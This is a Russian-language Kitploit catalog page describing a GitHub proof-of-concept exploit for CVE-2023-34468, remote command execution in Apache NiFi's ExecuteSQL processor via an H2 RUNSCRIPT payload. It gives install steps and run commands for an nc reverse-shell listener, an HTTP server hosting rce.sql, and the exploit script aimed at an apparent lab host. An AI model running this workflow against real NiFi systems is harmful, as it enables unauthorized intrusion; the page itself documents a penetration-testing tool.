Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-34468 — CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC | Kitploit
Инструменты/GitHubGitHub/ozcanpng/cve-2023-34468
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubozcanpng/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Репозиторий
31 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-34468 — Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC

Короткий PoC на Python для эксплуатации редактируемого процессора ExecuteSQL в Apache NiFi с помощью полезной нагрузки H2 RUNSCRIPT с целью инициирования удалённого выполнения команд через обратную оболочку Bash.

Только для авторизованного тестирования и исследований. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Что делает

root@kitploit:~
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
  1. Обнаруживает единственный процессор ExecuteSQL автоматически или принимает --processor-id вручную.
  2. Создаёт локальную полезную нагрузку rce.sql, которая определяет и вызывает реализованный на Java псевдоним для выполнения shell-команд.
  3. Предлагает вам запустить собственный nc-слушатель и HTTP-сервер.
  4. Обновляет запрос процессора, чтобы получить rce.sql через H2 RUNSCRIPT.
Скачать инструмент
  • Запускает процессор для активации обратной оболочки.
  • Восстанавливает исходную конфигурацию процессора после того, как вы подтвердите получение оболочки.

  • Скриншоты

    1. Настройка

    Настройка

    2. Запрос к полезной нагрузке

    Запуск эксплойта

    3. Получена оболочка

    Обновление процессора

    4. Результат

    Результат


    Установка

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2023-34468.git
    cd CVE-2023-34468
    python3 -m venv .venv
    source .venv/bin/activate
    pip install -r requirements.txt
    

    Использование

    Терминал 1:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Терминал 2, из каталога этого репозитория:

    root@kitploit:~
    python3 -m http.server 8000
    

    Терминал 3:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
    

    Для выбора процессора вручную:

    root@kitploit:~
    python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id <UUID> --lhost 10.10.16.53 --lport 4444
    

    Затронутые

    ПродуктЗатронутая версияТребуемый доступВоздействие
    Apache NiFiРазвёртывания, затронутые CVE-2023-34468, использующие редактируемое поведение ExecuteSQL/H2Возможность получить доступ к целевому процессору NiFi через API и изменить егоУдалённое выполнение команд

    Примечания

    • Скрипт предполагает, что API NiFi доступен, а текущий пользователь/сессия может изменять целевой процессор.
    • Сгенерированный файл rce.sql игнорируется git и должен раздаваться из каталога репозитория с помощью python3 -m http.server.
    • Если автоматическое обнаружение не находит процессор или находит несколько кандидатов, передайте UUID процессора вручную с помощью --processor-id.
    • Скрипт пытается восстановить исходную конфигурацию процессора ExecuteSQL после подтверждения получения оболочки.

    Ссылки

    • NVD — CVE-2023-34468
    • Apache NiFi
    • Команды базы данных H2

    Автор

    ozcanpng — github.com/ozcanpng — ozcanpng.dev